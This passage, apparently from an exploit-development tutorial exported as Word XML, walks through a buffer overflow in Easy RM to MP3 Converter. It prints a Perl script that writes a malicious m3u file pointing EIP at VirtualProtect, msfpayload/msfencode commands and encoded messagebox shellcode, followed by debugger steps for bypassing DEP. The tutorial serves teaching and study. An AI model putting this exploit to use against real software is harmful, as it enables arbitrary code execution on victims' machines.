        <w:gridCol w:w="1787"/>
        <w:gridCol w:w="7851"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1787"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7851"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junk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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7851"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eip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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7851"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junk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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7851"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xml:space="preserve">rop </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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ESP points here -&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7851"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parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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7851"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more rop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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7851"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padding / nops</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178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7851"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shellcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1787"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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7851"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junk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="test"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr/>
        <w:t>Test before you start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before actually building the rop chain, I will verify that the VirtualProtect() call will lead to the desired result. The easiest way to do this, is by manually crafting the stack / function parameters inside the debugger :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">make EIP point at the VirtualProtect() function call. On XP SP3, this function can be found at 0x7C801AD4 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">manually put the desired arguments for VirtualProtect() onto the stack </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">put the shellcode on the stack </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">launch the function. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If that works, I’m sure that the VirtualProtect() call will work, and that the shellcode works as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In order to facilitate this simple test, we’ll use the following sploit script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 based exploit for Easy RM to MP3 Converter</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x7C801AD4);  #pointer to VirtualProtect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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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$params=pack('V',0x01010101);   #return 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XXXX</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";          #lpAddress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YYYY</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";          #Size - Shellcode length</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ZZZZ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";          #flNewProtect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$params.pack('V',0x10035005);   #writeable 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./msfpayload windows/messagebox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TITLE=CORELAN TEXT="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop test by corelanc0d3r</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" R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 ./msfencode -e x86/alpha_mixed -t perl</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my $shellcode =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\x89\xe0\xda\xcf\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a</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\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59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\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41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\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42</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\x75\x4a\x49\x48\x59\x48\x6b\x4f\x6b\x48\x59\x43\x44\x51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\x34\x4c\x34\x50\x31\x48\x52\x4f\x42\x42\x5a\x46\x51\x49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\x59\x45\x34\x4e\x6b\x51\x61\x44\x70\x4e\x6b\x43\x46\x46</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\x6c\x4c\x4b\x42\x56\x45\x4c\x4c\x4b\x42\x66\x43\x38\x4c</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\x4b\x51\x6e\x45\x70\x4e\x6b\x50\x36\x44\x78\x42\x6f\x45</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\x48\x44\x35\x4c\x33\x50\x59\x43\x31\x4a\x71\x4b\x4f\x48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\x61\x43\x50\x4c\x4b\x50\x6c\x51\x34\x46\x44\x4e\x6b\x47</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\x35\x45\x6c\x4c\x4b\x42\x74\x43\x35\x42\x58\x46\x61\x48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\x6a\x4e\x6b\x51\x5a\x45\x48\x4e\x6b\x42\x7a\x47\x50\x47</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\x71\x48\x6b\x4a\x43\x45\x67\x42\x69\x4e\x6b\x47\x44\x4e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\x6b\x46\x61\x48\x6e\x46\x51\x49\x6f\x45\x61\x49\x50\x49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\x6c\x4e\x4c\x4d\x54\x49\x50\x50\x74\x45\x5a\x4b\x71\x48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\x4f\x44\x4d\x47\x71\x4b\x77\x48\x69\x48\x71\x49\x6f\x49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\x6f\x4b\x4f\x45\x6b\x43\x4c\x47\x54\x44\x68\x51\x65\x49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\x4e\x4e\x6b\x50\x5a\x45\x74\x46\x61\x48\x6b\x50\x66\x4e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\x6b\x46\x6c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x4a</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\x4b\x4e\x6b\x43\x34\x4c\x4b\x43\x31\x4a\x48\x4d\x59\x42</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\x64\x51\x34\x47\x6c\x45\x31\x4f\x33\x4f\x42\x47\x78\x44</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\x69\x49\x44\x4f\x79\x4a\x45\x4e\x69\x4a\x62\x43\x58\x4e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\x6e\x42\x6e\x44\x4e\x48\x6c\x43\x62\x4a\x48\x4d\x4c\x4b</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\x4f\x4b\x4f\x49\x6f\x4d\x59\x42\x65\x43\x34\x4f\x4b\x51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\x6e\x48\x58\x48\x62\x43\x43\x4e\x67\x47\x6c\x45\x74\x43</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\x62\x49\x78\x4e\x6b\x4b\x4f\x4b\x4f\x49\x6f\x4f\x79\x50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\x45\x45\x58\x42\x48\x50\x6c\x42\x4c\x51\x30\x4b\x4f\x51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\x78\x50\x33\x44\x72\x44\x6e\x51\x74\x50\x68\x42\x55\x50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\x73\x42\x45\x42\x52\x4f\x78\x43\x6c\x47\x54\x44\x4a\x4c</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\x49\x4d\x36\x50\x56\x4b\x4f\x43\x65\x47\x74\x4c\x49\x48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\x42\x42\x70\x4f\x4b\x49\x38\x4c\x62\x50\x4d\x4d\x6c\x4e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\x67\x45\x4c\x44\x64\x51\x42\x49\x78\x51\x4e\x49\x6f\x4b</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\x4f\x49\x6f\x42\x48\x42\x6c\x43\x71\x42\x6e\x50\x58\x50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\x68\x47\x33\x42\x6f\x50\x52\x43\x75\x45\x61\x4b\x6b\x4e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\x68\x51\x4c\x47\x54\x47\x77\x4d\x59\x4b\x53\x50\x68\x51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\x48\x47\x50\x51\x30\x51\x30\x42\x48\x50\x30\x51\x74\x50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\x33\x50\x72\x45\x38\x42\x4c\x45\x31\x50\x6e\x51\x73\x43</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\x58\x50\x63\x50\x6f\x43\x42\x50\x65\x42\x48\x47\x50\x43</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\x52\x43\x49\x51\x30\x51\x78\x43\x44\x42\x45\x51\x63\x50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\x74\x45\x38\x44\x32\x50\x6f\x42\x50\x51\x30\x46\x51\x48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\x49\x4c\x48\x42\x6c\x47\x54\x44\x58\x4d\x59\x4b\x51\x46</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\x51\x48\x52\x51\x42\x46\x33\x50\x51\x43\x62\x49\x6f\x4e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\x30\x44\x71\x49\x50\x50\x50\x4b\x4f\x50\x55\x45\x58\x45</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\x5a\x41\x41</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$nops = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>\x90</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 200;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$rest = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x 300;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$payload = $junk.$eip.$junk2.$params.$nops.$shellcode.$rest;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($shellcode)."</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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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$FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With this script, we will overwrite EIP with a pointer to VirtualProtect() (0x7C801AD4), and we will put the 5 required parameters on top of the stack, followed by some nops, and messagebox shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The lpAddress, Size and flNewProtect parameters are set to "XXXX", "YYYY" and "ZZZZ". We will manually change them in a few moments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Create the m3u file, attach Immunity Debugger to the application and set the breakpoint to 0x7C801AD4. Run the application, open the m3u file and verify that the breakpoint was hit :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2790825" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Image17" descr="">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a:hlinkClick r:id="rId72"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2790825" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Now look at the top of the stack. We should see our 5 parameters :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5495925" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Image18" descr="">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a:hlinkClick r:id="rId74"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Scroll down until you see the begin of the shellcode :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1943100" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Image19" descr="">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a:hlinkClick r:id="rId76"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1943100" cy="3067050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Take note of the base address of the shellcode (0010F80C in my case) and scroll down to verify that the entire shellcode was placed onto the stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The idea is now to manually edit the parameters on the stack so we can test if the VirtualProtect call would work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Editing a value on the stack is as simple as selecting the value, pressing CTRL+E, and entering a new value (just remember that it’s little endian !).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First, edit the value at 0010F730 (return address) and set it to the address of the shellcode (0010F80C).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4076700" cy="2076450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Image20" descr="">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a:hlinkClick r:id="rId78"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4076700" cy="2076450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then edit the value at 0010F734 (Address, now containing 58585858), and set it to 0010F80C (again, the address where your shellcode resides)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4076700" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Image21" descr="">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a:hlinkClick r:id="rId80"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4076700" cy="2162175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Next, edit the value at 0010F738 (Size, now containing 59595959) and set it to the size of the shellcode. I’ll just take 700 bytes (to be on the safe side), which corresponds with 0x2BC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4124325" cy="1857375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Image22" descr="">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a:hlinkClick r:id="rId82"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4124325" cy="1857375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It’s ok to be a little bit "off", just make sure that your shellcode will be contained within the Address+Size range.  You will see that it might be difficult to craft an exact value when using rop, so it’s important to understand that you don’t have to be exact. If you surround your code with nops and if you make sure you end up covering all of the shellcode, then it should be fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finally, edit the value at 0010F73C (NewProtect) and set it to 0x40 :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Image23" descr="">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a:hlinkClick r:id="rId84"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000500" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After making the modifications, the stack looks like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4591050" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Image24" descr="">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a:hlinkClick r:id="rId86"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4591050" cy="638175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
